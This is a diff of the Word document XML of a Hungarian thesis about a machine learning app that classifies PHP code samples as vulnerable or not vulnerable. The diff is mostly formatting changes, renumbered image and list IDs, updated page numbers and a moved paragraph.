                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -21408,35 +19497,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Logistic</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Regression</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">a Logistic Regression </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -21483,7 +19544,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId18" cstate="print">
+                    <a:blip r:embed="rId19" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -21528,30 +19589,8 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>K-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Nearest</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Neighbors</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>K-Nearest Neighbors</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -21603,7 +19642,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId19" cstate="print">
+                    <a:blip r:embed="rId20" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -21648,49 +19687,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Linear</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Support</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Vector</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">a Linear Support Vector </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -21700,9 +19697,9 @@
       </w:r>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId20"/>
-      <w:footerReference w:type="default" r:id="rId21"/>
-      <w:headerReference w:type="first" r:id="rId22"/>
+      <w:headerReference w:type="default" r:id="rId21"/>
+      <w:footerReference w:type="default" r:id="rId22"/>
+      <w:headerReference w:type="first" r:id="rId23"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1418" w:right="1418" w:bottom="1418" w:left="1418" w:header="709" w:footer="709" w:gutter="567"/>
       <w:cols w:space="708"/>
@@ -23047,6 +21044,119 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="315B27D8"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="84948FA0"/>
+    <w:lvl w:ilvl="0" w:tplc="040E0001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1287" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="040E0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2007" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="040E0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2727" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="040E0001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3447" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="040E0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4167" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="040E0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4887" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="040E0001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5607" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="040E0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6327" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="040E0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="7047" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="316417F3"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="AE74433C"/>
@@ -23187,7 +21297,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="35205D23"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="B03429DC"/>
@@ -23300,7 +21410,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="36260C9A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="25662176"/>
@@ -23413,7 +21523,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="45FE672C"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="5C664952"/>
@@ -23502,10 +21612,10 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="497422CA"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="3F8AFC22"/>
+    <w:tmpl w:val="D24C5A08"/>
     <w:lvl w:ilvl="0" w:tplc="040E0001">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
@@ -23615,7 +21725,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="590A1BF6"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="E24CFA5A"/>
@@ -23704,7 +21814,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="61BF323C"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="EA52E50E"/>
@@ -23817,7 +21927,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="66691043"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="FD28A20C"/>
@@ -23930,7 +22040,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="66C264D6"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="CD9A3D8E"/>
@@ -24043,7 +22153,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6B8E7620"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="D8E6ABE4"/>
@@ -24156,7 +22266,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="760D2097"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="EC5072AC"/>
@@ -24269,7 +22379,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="23" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="76805003"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="ADD2BED6"/>
@@ -24390,7 +22500,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="23" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="24" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="771832AE"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="F17E290E"/>
@@ -24503,7 +22613,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="24" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="25" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="79BB3A78"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="76AE7DE8"/>
@@ -24620,13 +22730,13 @@
     <w:abstractNumId w:val="2"/>
   </w:num>
   <w:num w:numId="2">
-    <w:abstractNumId w:val="11"/>
+    <w:abstractNumId w:val="12"/>
   </w:num>
   <w:num w:numId="3">
     <w:abstractNumId w:val="9"/>
   </w:num>
   <w:num w:numId="4">
-    <w:abstractNumId w:val="19"/>
+    <w:abstractNumId w:val="20"/>
   </w:num>
   <w:num w:numId="5">
     <w:abstractNumId w:val="7"/>
@@ -24638,22 +22748,22 @@
     <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="8">
-    <w:abstractNumId w:val="13"/>
+    <w:abstractNumId w:val="14"/>
   </w:num>
   <w:num w:numId="9">
     <w:abstractNumId w:val="3"/>
   </w:num>
   <w:num w:numId="10">
-    <w:abstractNumId w:val="24"/>
+    <w:abstractNumId w:val="25"/>
   </w:num>
   <w:num w:numId="11">
-    <w:abstractNumId w:val="17"/>
+    <w:abstractNumId w:val="18"/>
   </w:num>
   <w:num w:numId="12">
     <w:abstractNumId w:val="6"/>
   </w:num>
   <w:num w:numId="13">
-    <w:abstractNumId w:val="16"/>
+    <w:abstractNumId w:val="17"/>
   </w:num>
   <w:num w:numId="14">
     <w:abstractNumId w:val="10"/>
@@ -24668,7 +22778,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="16">
-    <w:abstractNumId w:val="22"/>
+    <w:abstractNumId w:val="23"/>
   </w:num>
   <w:num w:numId="17">
     <w:abstractNumId w:val="1"/>
@@ -24698,28 +22808,31 @@
     <w:abstractNumId w:val="4"/>
   </w:num>
   <w:num w:numId="22">
-    <w:abstractNumId w:val="20"/>
+    <w:abstractNumId w:val="21"/>
   </w:num>
   <w:num w:numId="23">
     <w:abstractNumId w:val="5"/>
   </w:num>
   <w:num w:numId="24">
-    <w:abstractNumId w:val="21"/>
+    <w:abstractNumId w:val="22"/>
   </w:num>
   <w:num w:numId="25">
-    <w:abstractNumId w:val="23"/>
+    <w:abstractNumId w:val="24"/>
   </w:num>
   <w:num w:numId="26">
-    <w:abstractNumId w:val="12"/>
+    <w:abstractNumId w:val="13"/>
   </w:num>
   <w:num w:numId="27">
-    <w:abstractNumId w:val="18"/>
+    <w:abstractNumId w:val="19"/>
   </w:num>
   <w:num w:numId="28">
-    <w:abstractNumId w:val="14"/>
+    <w:abstractNumId w:val="15"/>
   </w:num>
   <w:num w:numId="29">
-    <w:abstractNumId w:val="15"/>
+    <w:abstractNumId w:val="16"/>
+  </w:num>
+  <w:num w:numId="30">
+    <w:abstractNumId w:val="11"/>
   </w:num>
 </w:numbering>
 </file>

--- a/szakdolgozat.docx
+++ b/szakdolgozat.docx
@@ -3351,7 +3351,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>22</w:t>
+              <w:t>23</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3425,7 +3425,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>23</w:t>
+              <w:t>24</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3499,7 +3499,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>24</w:t>
+              <w:t>25</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3573,7 +3573,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>25</w:t>
+              <w:t>26</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3647,7 +3647,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>26</w:t>
+              <w:t>27</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -14821,133 +14821,6 @@
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Ebben a fejezetben </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>ismertetem</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>program</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> felépítésének lépéseit</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a korábbi fejezetet alapul véve</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">A 2.1-es fejezet felsorolásának legelső lépésével </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>kezdnem</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>, az adatgyűjtéssel.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">A 102 darab tanuló kód, amely a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\machine_learning_app\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>tanulo_adatok</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> mappában helyezkedik el</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a gépi tanulási modellem alapja.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:jc w:val="center"/>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -14959,10 +14832,10 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D7EF8D3" wp14:editId="4B1C992F">
-            <wp:extent cx="3194214" cy="482625"/>
-            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
-            <wp:docPr id="9" name="Kép 9"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A1CC2A3" wp14:editId="37E2A2E9">
+            <wp:extent cx="1541989" cy="1581150"/>
+            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
+            <wp:docPr id="16" name="Kép 16"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -14970,11 +14843,26 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPr id="16" name="Kép 16"/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId13"/>
+                    <a:blip r:embed="rId13">
+                      <a:extLst>
+                        <a:ext uri="{BEBA8EAE-BF5A-486C-A8C5-ECC9F3942E4B}">
+                          <a14:imgProps xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
+                            <a14:imgLayer r:embed="rId14">
+                              <a14:imgEffect>
+                                <a14:brightnessContrast bright="20000" contrast="-40000"/>
+                              </a14:imgEffect>
+                            </a14:imgLayer>
+                          </a14:imgProps>
+                        </a:ext>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -14982,7 +14870,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="3194214" cy="482625"/>
+                      <a:ext cx="1548728" cy="1588060"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -15011,259 +14899,156 @@
       </w:r>
       <w:r>
         <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\machine_learning_app\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>machine_learning_app</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>program fő mappájának felépítése</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ebben a fejezetben </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ismertetem</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>program</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> felépítésének lépéseit</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a korábbi fejezetet alapul véve</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">A 2.1-es fejezet felsorolásának legelső lépésével </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>kezdnem</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, az adatgyűjtéssel.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">A 102 darab tanuló kód, amely a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>tanulo_adatok</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>pdo1.php</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>, egy nem sérülékeny kód</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="567"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Az</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 57 darab sérülékeny és 45 darab nem sérülékeny kó</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>d</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> legelső lépésben </w:t>
-      </w:r>
-      <w:r>
